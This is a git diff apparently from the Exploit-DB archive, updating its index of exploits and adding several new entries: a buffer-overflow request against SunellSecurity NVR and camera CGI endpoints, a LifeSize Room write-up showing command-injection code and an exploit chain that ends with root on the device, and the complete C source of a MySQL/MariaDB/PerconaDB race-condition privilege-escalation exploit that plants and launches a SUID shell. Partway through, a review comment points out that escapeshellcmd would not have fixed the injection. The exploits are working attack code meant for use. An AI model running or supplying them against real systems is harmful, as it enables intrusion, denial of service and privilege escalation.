 36844,platforms/php/webapps/36844.txt,"WordPress 4.2 - Persistent Cross-Site Scripting",2015-04-27,klikki,php,webapps,0
@@ -33347,14 +33346,14 @@ id,file,description,date,author,platform,type,port
 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x - viewFriends.php Multiple Parameter Cross-Site Scripting",2012-02-21,"Aung Khant",php,webapps,0
 36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x - explanation.php explain Parameter Cross-Site Scripting",2012-02-21,"Aung Khant",php,webapps,0
 36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0
-36856,platforms/php/webapps/36856.txt,"Joomla! Component com_xvs - 'Controller' Parameter Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0
+36856,platforms/php/webapps/36856.txt,"Joomla! Component 'com_xvs' - 'Controller' Parameter Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0
 36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
 36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
 36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
 36860,platforms/php/webapps/36860.txt,"WordPress Plugin TheCartPress 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
-36863,platforms/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
+36863,platforms/php/webapps/36863.txt,"Joomla! Component 'com_machine' - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
 36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Cross-Site Request Forgery (Multiple Function)",2012-02-21,Busindre,hardware,remote,0
 36865,platforms/hardware/remote/36865.txt,"Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0
 36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - webconfig/wan/confirm.html/confirm pvcName Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0
@@ -33580,8 +33579,8 @@ id,file,description,date,author,platform,type,port
 37254,platforms/php/webapps/37254.txt,"WordPress Plugin History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80
 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0
 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0
-37101,platforms/php/webapps/37101.txt,"Joomla! Component CCNewsLetter Module 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0
-37102,platforms/php/webapps/37102.txt,"Joomla! Component Video Gallery - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0
+37101,platforms/php/webapps/37101.txt,"Joomla! Component 'mod_ccnewsletter' 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0
+37102,platforms/php/webapps/37102.txt,"Joomla! Component 'com_videogallery' - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0
 37103,platforms/php/webapps/37103.txt,"Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
@@ -33822,13 +33821,13 @@ id,file,description,date,author,platform,type,port
 37371,platforms/php/webapps/37371.php,"WordPress Plugin Picturesurf Gallery - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0
 37372,platforms/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0
 37373,platforms/php/webapps/37373.php,"WordPress Plugin Contus Video Gallery - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
-37374,platforms/php/webapps/37374.txt,"Joomla! Component Alphacontent - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0
-37375,platforms/php/webapps/37375.php,"Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0
+37374,platforms/php/webapps/37374.txt,"Joomla! Component 'com_alphacontent' - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0
+37375,platforms/php/webapps/37375.php,"Joomla! Component 'com_joomsport' - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0
 37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps,0
 37377,platforms/php/webapps/37377.php,"WordPress Plugin HD FLV Player - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
-37378,platforms/php/webapps/37378.php,"Joomla! Component Simple SWFupload - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
-37379,platforms/php/webapps/37379.php,"Joomla! Component Art Uploader - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
-37380,platforms/php/webapps/37380.php,"Joomla! Component DentroVideo - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
+37378,platforms/php/webapps/37378.php,"Joomla! Component 'com_simpleswfupload' - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
+37379,platforms/php/webapps/37379.php,"Joomla! Component 'mod_artuploader' - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
+37380,platforms/php/webapps/37380.php,"Joomla! Component 'com_dv' - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
 37381,platforms/php/webapps/37381.html,"Joomla! Component 'IDoEditor' - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
 37382,platforms/php/webapps/37382.php,"Joomla! Component 'mod_jfancy' - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
 37383,platforms/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
@@ -36299,7 +36298,7 @@ id,file,description,date,author,platform,type,port
 39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",ruby,webapps,80
 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80
 40111,platforms/php/webapps/40111.txt,"Joomla! Component 'com_guru' - SQL Injection",2016-07-14,s0nk3y,php,webapps,80
-39999,platforms/win_x86-64/remote/39999.rb,"PCMAN FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21
+39999,platforms/win_x86-64/remote/39999.rb,"PCMan FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21
 40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,php,remote,80
 40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80
@@ -36763,12 +36762,25 @@ id,file,description,date,author,platform,type,port
 40667,platforms/windows/dos/40667.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x7000014",2016-10-31,"Google Security Research",windows,dos,0
 40668,platforms/windows/dos/40668.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x10000e9",2016-10-31,"Google Security Research",windows,dos,0
 40669,platforms/osx/local/40669.txt,"Apple MacOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",osx,local,0
-40670,platforms/windows/remote/40670.py,"PCMAN FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow",2016-10-31,ScrR1pTK1dd13,windows,remote,0
+40670,platforms/windows/remote/40670.py,"PCMan FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow",2016-10-31,ScrR1pTK1dd13,windows,remote,0
 40674,platforms/windows/remote/40674.py,"Freefloat FTP Server 1.0 - 'ABOR' Command Buffer Overflow",2016-11-01,Ger,windows,remote,0
 40671,platforms/php/webapps/40671.txt,"School Registration and Fee System - Authentication Bypass",2016-11-01,opt1lc,php,webapps,0
 40672,platforms/windows/remote/40672.py,"Freefloat FTP Server 1.0 - 'RMD' Command Buffer Overflow",2016-11-01,Karri93,windows,remote,0
 40673,platforms/windows/remote/40673.py,"Freefloat FTP Server 1.0 - 'HOST' Command Buffer Overflow",2016-11-01,Cybernetic,windows,remote,0
 40675,platforms/windows/remote/40675.py,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)",2016-11-01,n30m1nd,windows,remote,0
 40677,platforms/windows/remote/40677.py,"Freefloat FTP Server 1.0 - 'RENAME' Command Buffer Overflow",2016-11-01,Eagleblack,windows,remote,0
-40678,platforms/linux/local/40678.txt,"MySQL / MariaDB / PerconaDB - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
-40679,platforms/linux/local/40679.txt,"MySQL / MariaDB / PerconaDB - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
+40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
+40680,platforms/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Command Buffer Overflow",2016-11-02,Eagleblack,windows,remote,0
+40681,platforms/windows/remote/40681.py,"Freefloat FTP Server 1.0 - 'DIR' Command Buffer Overflow",2016-11-02,ScrR1pTK1dd13,windows,remote,0
+40682,platforms/php/webapps/40682.txt,"Alienvault OSSIM/USM 5.3.1 - PHP Object Injection",2016-11-02,"Peter Lapp",php,webapps,0
+40683,platforms/php/webapps/40683.txt,"Alienvault OSSIM/USM 5.3.1 - Persistent Cross-Site Scripting",2016-11-02,"Peter Lapp",php,webapps,0
+40684,platforms/php/webapps/40684.txt,"Alienvault OSSIM/USM 5.3.1 - SQL Injection",2016-11-02,"Peter Lapp",php,webapps,0
+40685,platforms/windows/dos/40685.html,"Microsoft Internet Explorer 9 - MSHTML CAttrArray Use-After-Free (MS14-056)",2016-11-02,Skylined,windows,dos,0
+40686,platforms/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local,0
+40687,platforms/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial Of Service",2016-11-02,qwsj,hardware,dos,0
+40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / Redhat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
+40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
+40689,platforms/linux/remote/40689.rb,"Bassmaster 1.5.1 - Batch Arbitrary JavaScript Injection Remote Code Execution (Metasploit)",2016-11-02,Metasploit,linux,remote,0
+40690,platforms/hardware/webapps/40690.txt,"LifeSize Room 5.0.9 - Multiple Vulnerabilities",2016-11-02,"Xiphos Research Ltd",hardware,webapps,0
+40691,platforms/windows/dos/40691.html,"Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-Free",2016-11-02,Skylined,windows,dos,0
+40692,platforms/php/webapps/40692.html,"SweetRice 1.5.1 - Cross-Site Request Forgery",2016-11-02,"Ashiyane Digital Security Team",php,webapps,0
diff --git a/platforms/hardware/dos/40687.txt b/platforms/hardware/dos/40687.txt
new file mode 100755
index 000000000..378e9e5bd
--- /dev/null
+++ b/platforms/hardware/dos/40687.txt
@@ -0,0 +1,28 @@ +# Exploit Title: SunellSecurity NVR / Cams - Buffer overflow in CGI +# Date: 11.2.2016 +# Exploit Author: qwsj +# Vendor Homepage: https://github.com/qwsj +# Version: 1.6.08-09 / 2.0.06-08 +# Tested on: Windows / Linux + +Bug in CGI scrypt's for develop. +Web service buffer overflow and leading to a stop web service, and the device rebooted. + +Symbols (1072): -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +# For NVR: +Version firmware: +1.6.0902.0000.3.0.29.0.0 +1.6.0802.0000.0.0.2906.1.0 +Use link: http://IP/cgi-bin/videoStream.cgi?userName= + +# For Cams: +Version firmware: +2.0.0601.1002.3.0.56.0.1_TD +2.0.0801.1002.1.1.125.0.0 +2.0.0601.1002.3.0.33.0.12 +Use link: http://IP/cgi-bin/image.cgi?userName= + +# Eg: 
http://IP/cgi-bin/image.cgi?userName=-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +ЯR qwsj 2016 \ No newline at end of file diff --git a/platforms/hardware/webapps/40690.txt b/platforms/hardware/webapps/40690.txt new file mode 100755 index 000000000..f08b7480e --- /dev/null +++ b/platforms/hardware/webapps/40690.txt 
@@ -0,0 +1,84 @@ +Source: https://github.com/XiphosResearch/exploits/tree/master/deathsize + +LifeSize Room 5.0.9, remote config disclosure, code execution & local privilege escalation + +Ultimately the Lifesize Room products have fundamentally flawed firmware, many similar very bugs in the WebUI exist and thier support team have been recommending that port 443 isn't accessible via the internet. + +They've been alerted to several very similar bugs, and in some cases have fixed one gaping security hole only to leave another one literally 10 lines above completely untouched. facepalm + +What makes this different? This exploit will run your payload as root. + +Description + +This exploit uses the LsSystemRestore.sh script to disclose the current configuration, that is then leveraged to gain access to exploitable APIs in the admin portal which allow arbitrary command injection, then uses a local privilege escalation bug to execute the payload as root. + +This will work as long as port 443 is open on the phone, Lifesize support should recommend that the power and ethernet cables are disconnected from the device to ensure it remains secure. + +LsSystemRestore.sh allows autosh commands to be executed without any authentication, this is used to grab the Admin password via the get config -P command. + +Using the Admin password AMF commands can be sent to the LSRoom_Remoting endpoint, this contains a method called doPrefCommand which is vulnerable to command injection. + +function doPrefCommand($cmd, $id){ + + // Look for the existence of a "pref " and ";" needle. + $invalidCmd = $this->scrubPrefString($cmd); + + if ( $invalidCmd ) + { + return "invalid_command"; + } + + // If we get to here, we want to double check the command for + // any unwanted characters: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. 
' and " + //$cleanCommand = escapeshellcmd($cmd); + + $prefData = array(); + $value = rtrim(shell_exec($cmd)); +What's interesting here is that the escapeshellcmd function is commented out, this would have prevented the command injection, but all of the code on the firmware smells of barely competent development and least-effort attempts to patch security vulnerabilities. + +Local privilege escalation to root is gained by executing the setuid tcpdump_manager executable, which runs a program called reset_tcpdump using PATH to resolve its location using PATH=/tmp:$PATH tcpdump_manager + +Other exploits exist in the 'support' portal, providing command execution, for example in support/download_file.php: + + + + + +

Download File

+'); + +$file_to_download=$_REQUEST['file_to_download']; +{ + print("
\n"); + shell_exec("rm tmp/tmp-file.tmp"); + shell_exec("cp $file_to_download tmp/tmp-file.tmp"); +Usage + +$ deathsize.php 192.168.40.39 payload +[*] Retrieving admin password +[*] Saving config for 192.168.40.39 +[*] Admin password is: 1234 +[*] Authenticating for AMF RPC +[*] Sending command: ... +... +This will save the configuration for the device into the local file 192.168.40.39.config and then execute the code in your payload file as root on the device and print out the response. + +Timeline + +13th June 2016 - Notified LifeSize of multiple vulnerabilities +15th June - LifeSize start spamming my inbox with marketing messages +16th June - Requested escallation, support requested demo +22nd June - Telling LifeSize that no... just changing the password doesn't fix it +30th June - Test device provided by support +1st July - Owned their test device running latest firmware +4th July - Support can't reproduce or understand exploit +5th July - Engineering ticket created +7th July - Support recommend adding firewall, sigh +8th August - Provide PoC +Have had no further contact with them, unable to get a CVE assigned for this, product will be EOL in January 2017, seems like there's no firmware update coming... + + +Full Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40690.zip diff --git a/platforms/linux/local/40678.c b/platforms/linux/local/40678.c new file mode 100755 index 000000000..43db69e5c --- /dev/null +++ b/platforms/linux/local/40678.c 
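Review bot: The sentence after the `doPrefCommand` excerpt, that the commented-out `escapeshellcmd($cmd)` "would have prevented the command injection", claims more than the excerpt supports. `$cmd` is the whole command line handed to `shell_exec()`, and `escapeshellcmd()` only escapes shell metacharacters, so the request would still decide which program runs and with which arguments. For readers who use this write-up to audit or fix similar code, I would reword it to say that the durable fix is to keep request data out of the shell: map the request onto a fixed allowlist of commands and quote every argument with `escapeshellarg()`. The same applies to the `download_file.php` excerpt, where `$file_to_download` from `$_REQUEST` is interpolated into `shell_exec("cp ...")`. `scrubPrefString()` is not shown in the hunk, so how much it filters cannot be judged from here.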
@@ -0,0 +1,273 @@ +/* + +Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c + +MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit +mysql-privesc-race.c (ver. 1.0) + +CVE-2016-6663 / OCVE-2016-5616 + +Discovered/Coded by: + +Dawid Golunski +dawid[at]legalhackers.com +https://legalhackers.com + +Follow https://twitter.com/dawid_golunski for updates on this advisory. + + +Compile: +gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient + +Note: +* On RedHat-based systems you might need to change /tmp to another public directory (e.g. /uploads) + +* For testing purposes only. Do no harm. + +Full advisory URL: +https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html + +Video PoC: +https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html + +*/ + + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define EXP_PATH "/tmp/mysql_privesc_exploit" +#define EXP_DIRN "mysql_privesc_exploit" +#define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD" +#define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD" + +#define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD" + +#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary + +MYSQL *conn; // DB handles +MYSQL_RES *res; +MYSQL_ROW row; + +unsigned long cnt; + + +void intro() { + +printf( + "\033[94m\n" + "MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n" + "mysql-privesc-race.c (ver. 1.0)\n\n" + "CVE-2016-6663 / OCVE-2016-5616\n\n" + "For testing purposes only. 
Do no harm.\n\n" + "Discovered/Coded by:\n\n" + "Dawid Golunski \n" + "http://legalhackers.com" + "\033[0m\n\n"); + +} + +void usage(char *argv0) { + intro(); + printf("Usage:\n\n%s user pass db_host database\n\n", argv0); +} + +void mysql_cmd(char *sql_cmd, int silent) { + + if (!silent) { + printf("%s \n", sql_cmd); + } + if (mysql_query(conn, sql_cmd)) { + fprintf(stderr, "%s\n", mysql_error(conn)); + exit(1); + } + res = mysql_store_result(conn); + if (res>0) mysql_free_result(res); + +} + + +int main(int argc,char **argv) +{ + + int randomnum = 0; + int io_notified = 0; + int myd_handle; + int wpid; + int is_shell_suid=0; + pid_t pid; + int status; + struct stat st; + /* io notify */ + int fd; + int ret; + char buf[4096] __attribute__((aligned(8))); + int num_read; + struct inotify_event *event; + /* credentials */ + char *user = argv[1]; + char *password = argv[2]; + char *db_host = argv[3]; + char *database = argv[4]; + + + // Disable buffering of stdout + setvbuf(stdout, NULL, _IONBF, 0); + + // Get the params + if (argc!=5) { + usage(argv[0]); + exit(1); + } + intro(); + // Show initial privileges + printf("\n[+] Starting the exploit as: \n"); + system("id"); + + // Connect to the database server with provided credentials + printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host); + conn = mysql_init(NULL); + if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) { + fprintf(stderr, "%s\n", mysql_error(conn)); + exit(1); + } + + // Prepare tmp dir + printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN); + umask(000); + system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN); + system("chmod g+s /tmp/" EXP_DIRN ); + + // Prepare exploit tables :) + printf("\n[+] Creating mysql tables \n\n"); + mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0); + mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0); + mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data 
directory '" EXP_PATH "'", 0); + mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); + + // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file + // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory + printf("\n[+] Copying bash into the mysql_suid_shell table.\n After the exploitation the following file/table will be assigned SUID and executable bits : \n"); + system("cp /bin/bash " SUID_SHELL); + system("ls -l " SUID_SHELL); + + // Use inotify to get the timing right + fd = inotify_init(); + if (fd < 0) { + printf("failed to inotify_init\n"); + return -1; + } + ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE); + + + /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */ + + printf("\n[+] Entering the race loop... Hang in there...\n"); + + while ( is_shell_suid != 1 ) { + + cnt++; + if ( (cnt % 100) == 0 ) { + printf("->"); + //fflush(stdout); + } + + /* Create empty file , remove if already exists */ + unlink(MYSQL_TEMP_FILE); + unlink(MYSQL_TAB_FILE); + mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1); + mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1); + + /* random num if needed */ + srand ( time(NULL) ); + randomnum = ( rand() % MAX_DELAY ); + + // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink + pid = fork(); + if (pid < 0) { + fprintf(stderr, "Fork failed :(\n"); + } + + /* Child process - executes REPAIR TABLE SQL statement */ + if (pid == 0) { + usleep(500); + unlink(MYSQL_TEMP_FILE); + mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1); + // child stops here + exit(0); + } + + /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */ + if (pid > 0 ) { + io_notified = 0; + + while (1) { + int processed = 0; + ret = read(fd, buf, sizeof(buf)); + if (ret < 0) { + 
break; + } + while (processed < ret) { + event = (struct inotify_event *)(buf + processed); + if (event->mask & IN_CLOSE) { + if (!strcmp(event->name, "exploit_table.TMD")) { + //usleep(randomnum); + + // Set the .MYD permissions to suid+exec before they get copied to the .TMD file + unlink(MYSQL_TAB_FILE); + myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777); + close(myd_handle); + chmod(MYSQL_TAB_FILE, 04777); + + // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec + unlink(MYSQL_TEMP_FILE); + symlink(SUID_SHELL, MYSQL_TEMP_FILE); + io_notified=1; + } + } + processed += sizeof(struct inotify_event); + } + if (io_notified) { + break; + } + } + + + waitpid(pid, &status, 0); + } + + // Check if SUID bit was set at the end of this attempt + if ( lstat(SUID_SHELL, &st) == 0 ) { + if (st.st_mode & S_ISUID) { + is_shell_suid = 1; + } + } + + } + + printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt); + system("ls -l " SUID_SHELL); + + printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n"); + system(SUID_SHELL " -p -i "); + //system(SUID_SHELL " -p -c '/bin/bash -i -p'"); + + /* close MySQL connection and exit */ + printf("\n[+] Job done. Exiting\n\n"); + mysql_close(conn); + return 0; + +} \ No newline at end of file diff --git a/platforms/linux/local/40678.txt b/platforms/linux/local/40678.txt deleted file mode 100755 index ae2a84ef9..000000000 --- a/platforms/linux/local/40678.txt +++ 